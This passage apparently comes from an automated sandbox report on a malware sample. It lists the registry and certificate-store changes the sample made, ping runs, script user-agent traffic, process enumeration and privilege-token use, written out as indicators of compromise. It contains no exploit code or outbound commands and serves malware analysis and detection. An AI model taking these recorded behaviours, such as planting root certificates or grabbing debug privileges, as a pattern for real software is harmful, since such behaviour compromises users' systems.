MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0e074210fc40d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 64c01116fc40d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}\1 = "3088" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 filee.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e filee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs ping.exe 1 TTPs 9 IoCs
pid Process 4720 PING.EXE 5656 PING.EXE 9732 PING.EXE 1748 PING.EXE 5100 PING.EXE 7472 PING.EXE 8148 PING.EXE 7724 PING.EXE 1012 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 251 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 254 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 539 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 544 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 552 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 557 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1276 rundll32.exe 1276 rundll32.exe 2256 svchost.exe 2256 svchost.exe 2256 svchost.exe 2256 svchost.exe 1788 ultramediaburner.tmp 1788 ultramediaburner.tmp 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe 3356 Saevyfolaedo.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4872 MicrosoftEdgeCP.exe 4872 MicrosoftEdgeCP.exe 4872 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeTcbPrivilege 2256 svchost.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 196 JoSetp.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeDebugPrivilege 1276 rundll32.exe Token: SeTcbPrivilege 2256 svchost.exe Token: SeDebugPrivilege 3984 Ultra.exe Token: SeAuditPrivilege 2424 svchost.exe Token: SeDebugPrivilege 2324 Joqypaezhyzhu.exe Token: SeDebugPrivilege 3356 Saevyfolaedo.exe Token: SeAssignPrimaryTokenPrivilege 2724 svchost.exe Token: SeIncreaseQuotaPrivilege 2724 svchost.exe Token: SeSecurityPrivilege 2724 svchost.exe Token: SeTakeOwnershipPrivilege 2724 svchost.exe Token: SeLoadDriverPrivilege 2724 svchost.exe Token: SeSystemtimePrivilege 2724 svchost.exe Token: SeBackupPrivilege 2724 svchost.exe Token: SeRestorePrivilege 2724 svchost.exe Token: SeShutdownPrivilege 2724 svchost.exe Token: SeSystemEnvironmentPrivilege 2724 svchost.exe Token: SeUndockPrivilege 2724 svchost.exe Token: SeManageVolumePrivilege 2724 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2724 svchost.exe Token: SeIncreaseQuotaPrivilege 2724 svchost.exe Token: SeSecurityPrivilege 2724 svchost.exe Token: SeTakeOwnershipPrivilege 2724 svchost.exe Token: SeLoadDriverPrivilege 2724 svchost.exe Token: SeSystemtimePrivilege 2724 svchost.exe Token: SeBackupPrivilege 2724 svchost.exe Token: SeRestorePrivilege 2724 svchost.exe Token: SeShutdownPrivilege 2724 svchost.exe Token: SeSystemEnvironmentPrivilege 2724 svchost.exe Token: SeUndockPrivilege 2724 svchost.exe Token: SeManageVolumePrivilege 2724 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2724 svchost.exe Token: SeIncreaseQuotaPrivilege 2724 svchost.exe Token: SeSecurityPrivilege 2724 svchost.exe Token: SeTakeOwnershipPrivilege 2724 svchost.exe Token: SeLoadDriverPrivilege 2724 svchost.exe Token: SeSystemtimePrivilege 2724 svchost.exe Token: SeBackupPrivilege 2724 svchost.exe Token: SeRestorePrivilege 2724 svchost.exe Token: SeShutdownPrivilege 2724 svchost.exe Token: SeSystemEnvironmentPrivilege 2724 svchost.exe Token: SeUndockPrivilege 2724 svchost.exe Token: SeManageVolumePrivilege 2724 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2724 svchost.exe Token: 